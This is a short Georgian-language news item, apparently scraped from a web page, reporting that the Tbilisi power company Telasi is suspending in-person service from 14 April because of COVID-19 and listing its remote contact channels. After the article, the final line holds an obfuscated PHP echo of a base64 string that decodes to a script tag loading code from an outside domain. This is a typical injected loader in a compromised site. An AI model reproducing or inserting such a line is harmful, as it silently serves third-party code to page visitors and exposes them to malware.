celsiusi
ავერსი საქკაბელი
უწყებათაშორისი საკოორდინაციო საბჭოს რეკომენდაციის შესაბამისად და COVID-19-ის გავრცელების პრევენციის მიზნით, „თელასი“ მუშაობის დისტანციურ რეჟიმზე გადადის.
 
კომპანიის ცნობით, 14 აპრილიდან „თელასის“ მომსახურების ცენტრებში მომხმარებელთა მიღება დროებით შეჩერდება. კომპანიის მომხმარებლები სრულყოფილი დისტანციური მომსახურებით ისარგებლებენ.
 
როგორც „თელასში“ განმარტავენ, კომპანიის მომსახურების მიღება შესაძლებელია call-ცენტრის (2 77-99-99), კომპანიის ოფიციალური facebook-გვერდის (ს.ს თელასი - ოფიციალური გვერდი) და ვებ-გვერდის (www.telasi.ge) მეშვეობით.
 
ნებისმიერი განცხადების გაგზავნა კომპანიაში შესაძლებელია ელექტრონულ მისამართზე ელ-ფოსტის ეს მისამართი დაცულია სპამ-ბოტებისგან. ნახვისთვის უნდა გქონდეთ ჩართული JavaScript..
 
ვებ-გვერდზე (my.telasi.ge.) რეგისტრაციის გავლის შემდეგ, მომხმარებელს შეუძლია ონლაინ რეჟიმში განცხადების შევსება ახალ აბონენტად დარეგისტრირებისა და გამანაწილებელ ქსელზე მიერთების შესახებ.
 
სს „თელასის“ ყველა შესაბამისი სამსახური შეუფერხებლად მუშაობს თბილისის უწყვეტი ელექტრომომარაგების უზრუნველსაყოფად.
1158
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");